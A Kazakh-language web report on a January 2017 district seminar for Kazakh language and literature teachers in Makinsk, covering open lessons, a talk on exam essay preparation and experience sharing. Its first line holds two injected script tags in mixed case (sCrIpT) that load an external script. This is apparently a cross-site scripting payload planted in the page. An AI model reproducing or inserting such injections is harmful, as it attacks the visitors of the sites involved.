<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2017

Қазақ тілі мен әдебиет пәні

мамандарының аудандық семинар қорытындысы

Аудандық әдістемелік

кабинетінің жоспары негізінде 2017 жылғы 30-31 қаңтар аралығында «Иновациялық

технологияны ұтымды пайдалана отырып, оқушылардың пәнге деген қызығушылығын

арттыру»  тақырыбы бойынша Макинск

мектеп-гимназиясы және «Оқу мен оқытудағы әдіс-тәсілдерді сабақта қолдану

тәжірибесінен» атты тақырыбымен  Макинск

№ 5 ОМ базасында аттестациядан өтетін мұғалімдерді әдістемелік сүймелдеу;

тәжірибе алмасу, оқу мен оқытудағы озық тәсілдерді тарату мақсатында  аудандық семинары өткізілді.

Семинар екі бөлімнен өткізілді.

Практикалық бөлімінде қазақ тілі мен әдебиет пәнінің мұғалімдері Мұса Маржангүл

 (№5 ОМ), Хаявар Өсерхан (Шұбарағаш ОМ),

Шаймұрат Нұртас (Айнакөл ОМ), А.Кудеренова (№ 5 ОМ), Д.Нурабаева, Г.Сейдуллаева

(макинск-мектеп), Д.Алибекова (Алакөл НМ), А.Кинабаева (Алтынды ОМ),

Р.Балтабаева (Отрадное ОМ) өте жоғары деңгейде  сабақтар көрсетті. Теориялық бөлімінде № 5 ОМ

мұғалімі Хасихан Елик «Қазақ тілінен қорытынды емтиханда эссе жазуға дайындау

тәсілдерінен» тақырыбында қорытынды аттестаттау –

жалпы орта білім беру ұйымдарында өткізілетін 11 (12) сынып оқушыларына

арналған мемлекеттік бітіру емтиханы туралы мәлімет берді. Сонымен қатар,

шығармашылық есеп берген З.Аширбекова (№ 3 ОМ), Б.Жусупова (мектеп-гимназиясы),

А.Сураганова (мекетеп-лицейі) тіл мамандары өз тәжірибесімен бөлісті.

Семинарға қатысқан

тіл мамандары бір ауызбен санатқа берген мұғалімдер санатын көтерсін деген

ұсыныс білдірді.

 

 

Ж.Ажданова- АӘК әдіскері

Просмотров: 946

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу